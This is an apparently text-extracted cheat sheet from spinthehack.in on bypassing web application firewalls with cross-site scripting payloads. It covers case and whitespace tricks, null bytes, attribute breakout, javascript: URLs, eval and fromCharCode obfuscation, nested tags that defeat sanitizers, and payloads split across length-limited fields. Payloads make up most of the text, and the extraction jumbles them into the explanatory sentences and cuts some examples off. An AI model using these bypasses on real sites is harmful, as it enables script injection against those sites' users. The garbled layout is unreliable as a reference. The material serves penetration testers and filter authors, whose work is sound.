This is our normal payload but now if WAF is blocking
<script>,alert,</script> tags, then you can try this.
<script >alert(1)</script> Try giving random
whitespaces to <script >alert(1)</script> bypass WAF.
<script	>alert(1)</script> Try giving random
HTML encoded <script
>alert(1)</script> values between <script
>alert(1)</script> Script tags.
Try lowercase or <ScRipT>alert(1)</sCriPt> uppercase letters in between or add <%00script>alert(1)</script> %00 to bypass <script>al%00ert(1)</script> alert word restriction. XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Attributes and Tags
<input type =“text” name=“input” value=“hello”>
You can try this payload to fool the website, because as it
has <> (closing tag) and the website gets terminated as it feels like the value is empty.
<input type="text" name="input" Try writing XSS
value="><script>alert(1)</script> test code
<randomtag type="text" Try writing any
name="input" random tag at value="><script>alert(1)</script> starting
Trying to Change <iNpUt type="text" name="input" Lower case and value="><script>alert(1)</script> Upper case can also work
Try replacing the
<input/'type="text" name="input" space or writing value="><script>alert(1)</script> any HTML values between tags XSS WAF Bypass Trick www.spinthehack.in
<input	type="text" name="input" Try replacing the value="><script>alert(1)</script> space or writing any HTML values <input
type="text" name="input" between tags value="><script>alert(1)</script>
Try inserting null value="><script>alert(1)</script> byte (%00) at different <inp%00ut type="text" name="input" positions value="><script>alert(1)</script>
<input t%00ype="text" name="input"
value="><script>alert(1)</script> Null Byte can work on Attribute name and values <input type="text" name="input" too value="><script>a%00lert(1)</script> XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Event Handlers
<input >
A Button which a user is going to click on a page. By
working on some JavaScript we can create a button (an event).
<object Try these
<body alternatives instead on <body > onsubmit (if it <script doesn’t work) <input autofocus ></a >
<audio src="new.mp3" > These alternatives can <video src="new.mp4" also be used if it the HTML used here is HTML5 <svg width="200" height="100" > XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Delimiters & Brackets
Delimiter is one or more character used to separate text
Same as Delimiters, Brackets can also help to bypass website or page filters.
By using extra brackets the system can be <<script>alert(1)//<</script> tricked, and by using double slash it comments out the extra bracket on closing tag
Open Bracket at <input the end could also help to bypass
Try using different «input > brackets
Try using ®input different Characters XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Psuedo Protocols <a href="https://www.google.com">Click Here</a> It’s a hyperlink where a user goes from one page to another with just one click
<a href="javascript:alert(1)">Click Here</a>
Try Injecting a code using Javascript to check XSS
<img src=javascript:alert(1)>
<form action=javascript:alert(1)> Other attributes <object data=javascript:alert(1)> also can be used that takes URL as a value <button formaction=javascript:alert(1)>
if the function is <script>eval('al' + blocked then some actual characters 'ert(1)')</script> can work
<script>eval(String.fromCharCode(97, 108, 101,
114, 116, 40, 49, 41))</script> There is another function that can be used in lieu of eval() called fromCharCode(). XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Meta Refresh & File Renaming
Web browser can automatically refresh the current page
<script src="payload.jpg"> source to an image file XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Sanitization & Length Limits
Try adding multiple
<script><script>alert(1)</s tags. (sometimes application removes cript> first instance of script tag)
Can add any tag for
<sc<script>ript>alert(1)</s first instance to get filtered by application cript>
If a page is being returned because of the
Length Limit then:
<input type="hidden" name="id“
value=""><script>/*"> /* and */ get ignored, <input type="hidden" name="checksum" so the browser ultimately processes value="*/alert(1)/*"> our payload as if it was injected in only one <input type="hidden" name="status" location value="*/</script>" XSS WAF Bypass Trick www.spinthehack.in
Watch here
▪ Advance Filter Evasion Techniques
<script>alert(1)</script>
Imagine in this payload you are not allowed to use
</script> which is closing tag.
What will you do now?
Don’t worry we have solution for you, OWASP official website have covered a list of more different tricks to bypass WAF.
